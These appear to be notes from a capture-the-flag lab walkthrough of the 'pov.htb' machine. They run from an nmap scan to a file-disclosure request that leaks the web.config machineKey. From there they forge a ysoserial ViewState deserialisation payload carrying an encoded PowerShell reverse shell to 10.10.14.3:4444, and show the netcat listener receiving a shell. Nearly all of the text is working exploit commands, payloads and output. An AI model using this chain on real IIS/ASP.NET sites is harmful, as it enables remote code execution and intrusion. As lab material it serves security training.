ViewState Exploitation

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: pov.htb
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-favicon: Unknown favicon MD5: E9B5E66DEBD9405ED864CAC17E2A888E
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

sfitz@pov.htb

dev.pov.htb

File Disclosure

POST http://dev.pov.htb/portfolio/ HTTP/1.1

__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=MKk9lhNz%2FucaaBvlCY0W4ghXvVWWKls9McF31umogbDNGJ7G6ouGYb1i4nrnpc6b6hR65hQ8I5m5%2BVa%2FQ2jXghRRu%2Bg%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=t9NN4MpvzeJOF2kjBiCNobGeydVxcYfFKATL9EHniZGPC7GQFlYJ5taGjYIF2aLLUaFD%2BjRgEw1CLRSw1R%2BUi6u4F3jfAhBNs%2FVPLf1Zu8xpitZ1qzWV09aFzx0IkGIWiNObsA%3D%3D&file=/web.config

<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="default.aspx" />
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
  </system.web>
    <system.webServer>
        <httpErrors>
            <remove statusCode="403" subStatusCode="-1" />
            <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
        </httpErrors>
        <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
    </system.webServer>
</configuration>

Osint

https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/

https://github.com/0xacb/viewgen

ViewState Exploitation

ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio/default.aspx" -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="

i3tR0o2y7N80FeildozlgfrO6NihOF8y5M2NXkGri4i0lbPKnSWIk1a0nTxY%2B11AdsLP7s2fh%2B3b18HFP066PatVhTAFL5EhFm1Y%2B%2Fyk5AyX55q%2Fd98eHIs%2BLhZP1HNp5DyEiW0hNl6iAJH8W1IpleI%2Ft2Km3QDyV0POEXnaNoDGZhIBoNCHd6c4Qo91LGmskolvrZGTCYzY4%2BTXLhupDD%2FQkmr8%2Blem3TD4RziqTYC2Ba%2FzpyXBMdURAC39%2BacfVve66vJ%2BHE6VJGuParV720FgEf6DpaW9v5VyjcTikRsItTtgSxbtCb5jjyEIhKj%2BZuKSAn24JQaEXtjMhTU2T9KM2hEyTLY04QQvX3HbU%2FvXRDzCaujTOXQiXdCbRbW8hX%2Bd9YEgUZhtgSYadu0sR1ZGL3kpYoFCnQ1Z0gWjvWDYYyeEJJWwaz8JQpoG%2FBm2FvYvg04ggsXReMDIpqRRBLtZf7Vk37Y2az3TiLUvyDSV6sJS4ETlELGl%2FSv3io2mWgaRJ2sap7S08%2BvwgE34mqcCPMP73157qj3NeT0oPf4SzYP0fO1w48%2BVAquku1DjI18YvqDTGN83pncQS8dBRGzKqIdjAehIyvYpqasYRDmmZ07yf8bV2GXnUrsF%2BNBnKK2TiiaBBoFIhBiRy5IdibyKwJic%2BoZb59CIOMexbfSLz8CQlfDqzx%2B8zZS8imJgup8DcCozg%2FTFnbn1Ltfmt9An9Lv1pv5fHsx9%2Br%2F%2FxXPi6oiUqczmiQHZABK70YfpmQK5u32gRxtiiTNZoI07E2WBSyBv1JLbVmiPrk9gSScPF8QoVtmzhB59Hf%2BF%2FhrS64dwqtoXIRELo60wQ5o5%2BMKLZdQCNVGt8zKY8jwXhTqL1wrE8JdEfQo6lJYY77sWkVncifDvNS6wtlaS%2BjvLPJn5wmXt0%2BL3xd%2BCc%2FUIzh2Fi2979djqIdAB0dZOXSAd85kyLTfBaARWmeKLSsRpKksOy9VjklaE51IOwTs0YyKrcSPKIh9De9N8ayW8fe1ctaV7tZWWFaKGiEQ6VpK7xx1vXA7YOtyVbDyizFNgFco2UVQWyFQ%2FXHQbMAn6wqqvdDzZfQXX1sjzNZyndxMidJE3y%2BR04Of8ogINmvtqzosBxw7DqAhu9FuwBQ45fSGj9QXznIDjbqX0n%2FMOIIcMChxtkIdnykQFHD%2F3DvOxdIsnN%2FXCoV%2B9rYotS83ypVaqjI6qy0%2F2Sc4i7jjrUvMJlgxzeuVOPHDlbiIfkjGq1LCQmsv23e81oNTTQr4yoKWlHiKTw%2FZvcXopA1JEYdkpfUh04j%2Bf6vxa%2BLM2cBuOJhCQjrMTROEh90rbbqdBfuOevLJTM37tFc%2FXNr%2BJEcD1JG00TWaHPBgcWxnofe3JQkpLKGdfagsRYwkaCPn9Pr5H%2FXWjgk%2Boj1EfUXSRjYC1NrE86nbaFRyTR5mVbJCkRKcAiiLHVt8kraHuvLNY8WUoEEPt6TUtsElw%2BWWdzXjmzzzQ46bS5jC3YQmXAzwWizrdDFrnDv5h1lN0byZc%2B1O5F0jPU5jOHI47nMOPoFK2GQZyJnQ9%2B4UeGoA9AqSV5VkeO%2FUi%2BZnrkWDj63r5GrMaUmvIVtxu3zJW1o51BhiyjkQJ45xn3mm6O2ohFnDRMekNaYvGnBhBAhzzmqZtTglY3R8ZAiQDUDl0VCqatTP8N4p3T14FbqE%2BhrxwC26FuMCX0aI3WG8nYI%2B0IAwWsNuJ1GLP1MaF5AwSrpAbpT%2BcyEi5lC7cZHFIAcUph3BCmVLt0x8Y2Y1qbfSuQluNl6vzCCiwhIbf0BdFerpuu66dFPptOOkumur9fc5xj6zHH79WJmiT63yTJqz6M9DrEfTnaQtDmxSW4AvB%2FsTKp8zdC8ySbiFFLxctVtnbrS2uyGDdGW2%2FdbJ20b3okDhNnNL2XCycPNZCaF2n5GqxoxJVt8TFsHIgyIo0Bm6wLTbU4Md9q0KP6prcgforz971XD4NRL86R6MN8vYMcpF5MUYkZvt2TntiCYy3lG9wlpVHIUySfIZg0oQeZqYXux29y%2FOKmWyApfzONtwyh2HBPSQJ6qXCwNu2Ea3VG24oaprYMRwznet84igFMuijOO09tO0J1in9Ke0S%2BHyrkRNYgoHWFvriUYg9s0sb8S6TMzJ7RBUIEP%2BMvKFCosvz%2FdbpCfQZ5t4NsRzD7U5mso3T1gt88BHboiNx9WgaPj4J6GOkiN9Y40q7%2BVCjFJFiHNonsSjHbvWk6ltRL7YH54b7uGViVSAAoG8zo5Fu2M24HGOXHDh3pL%2FyPOGeP69dRnbpdUokOMmdv8%2B9gox9QaMR5lz%2FWlPw%2FRtxZTNpAetDYNjga9%2Fy%2FZMwBSYQkAPoG23uNQe7y%2FEXzc627l0Ce7DiqWPdLTI1KFOcko0b1zxsZhLXz4hYNq%2Bb3siaKs%2FFX88%2FgimYAo%2Fone2aZBM7WFOrfqNc%2FCY6umRpdusGuwRL8rQ4OjWxRHZbb5RBeuTK64mE6wqEDPrWilIvgus9KPN4rWzirDCrdyLiwtdOv%2F72e3bQtTSE0MAZpbYcmeLvAbFPudSxLO3%2Fy62v0DMJzXW%2BeXSoPUKXwxc6NPkYdSyry%2FBdBoDCFPdVSPL8QDi%2F7wuSZCBiIS%2FDw3%2BP778iAIjE6BUaKOKJoIr%2BuO5ppZhwOYEJ7b5kly%2F39r%2F7K9m7Sab%2BelVkQFmRabk8vhQCbL01jEqjzY6o%2FdQ2QdLmZxwfwIzzY68tYxbYLCZsnluB4tS%2BO3ph3eSe7GyDQzH%2FCshnX8Rl17Bk9g7Wx4fZv9aZELRdxZZRTj9FZSW%2BRQIpF0S57cJGFu4DWLKh7Kc0graAO%2BH2HKya8k1aVTmF8YrCfDg%2FtbUC6SmAmQnYW4Dk6YVhZdva2HhJeoYgInIODoJt238W6ePuC9NbUDoAHZgVr3HAkLld3ArCUWniJl%2FeLm06LjlubL0611MBKDMqLiAxdUec5olBfruDKnEJrzSHLu6053RhWgeFttuH9%2BAG8aaOnFMWddcHFuqzojBpv4Z5Y2L%2FoAY%2F%2Fryqsb%2BInlzKWNuyeH8fGjI0laGnSD56k%2BkqDZ2QQ9ZOvw%3D%3D

Zap

__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=PAYLOAD-FROM-ABOVE&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=ES11QYAX2ZVFrp%2BzlJJG4mJFC2293dH2hFSVDKmEw41sLz74vZGJhKJcq4%2BdmZc39f%2BD1IICI6wwq52rGxXeJqC8aFioJXIc5%2FVqDNbhAfffnH62Jb9p%2Bvk3O9Mk0vCqnR%2BnCg%3D%3D&file=cv.pdf

\u250c\u2500\u2500(kali\u327fkali)-[~/htb/pov/Release]
\u2514\u2500$ nc -lvnp 4444         
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.251] 49671

PS C:\windows\system32\inetsrv> whoami
pov\sfitz
PS C:\windows\system32\inetsrv>